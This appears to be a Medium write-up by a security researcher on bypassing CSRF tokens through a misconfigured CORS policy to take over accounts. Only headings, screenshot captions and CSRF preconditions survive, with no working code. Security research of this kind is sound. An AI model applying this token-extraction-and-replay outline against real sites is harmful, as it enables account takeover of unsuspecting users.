Bypassing CSRF token protection by abusing a misconfigured CORS policy


Brief explanation of SOP, CORS and CSRF (skip if you know already)

Same-Origin Policy (SOP)

  • JavaScript on Site A from reading the cookies of Site B.
  • JavaScript on Site A from reading the content of Site B.

Cross-Origin Resource Sharing (CORS)

Cross-Site Request Forgery (CSRF)

  • A relevant action
  • Cookie-based session handling (no other auth method is used so cookies are sent)
  • No unpredictable request parameters: the attacker doesn’t have to guess any values. For example, when causing a user to change its password, the function is not vulnerable if an attacker needs to know the value of the current password. (A valid action would be changing the account’s email to one that the attacker controls).

Understanding our target before the attack

main page
Registration as user/user
Login request. Not important
Logged in and Change Password page
CSRF token in html form
Change password request
Change password response
Change password request testing CORS vuln
Change password response testing CORS vuln

The Attack

Exploit: Part 1

Exploit: Part 2

Wrapping everything up!

Complete attack requests
2nd request. CSRF Token extraction request
2nd Request Response. CSRF Token extraction response
3rd Request. Actual CSRF attack with the token included and the password we chose!! ACCOUNT TAKEOVER

Final words




Security Researcher | Bug Hunter @LihaftSec

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What Hardware Vendors Don’t Want You to Know About their Support

What Is Shadow IT and How Can Enterprises Manage It?

LimaCharlie Secures 5.45 Million in Seed Funding

Does NAC Strengthen your Security Posture for Network Segmentation?

36 Cartel ID Spectator Giveaway

Matrix AI Network BioWallet — Part 3

Red Canari offer IATA member airlines opportunities to strengthen cyber resilience

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Security Researcher | Bug Hunter @LihaftSec

More from Medium

Hashing the Favicon.ico

An Clickjacking - Which Rewarded me with 275$

Authentication Bypass & ATO

A short story of IDOR for your perspective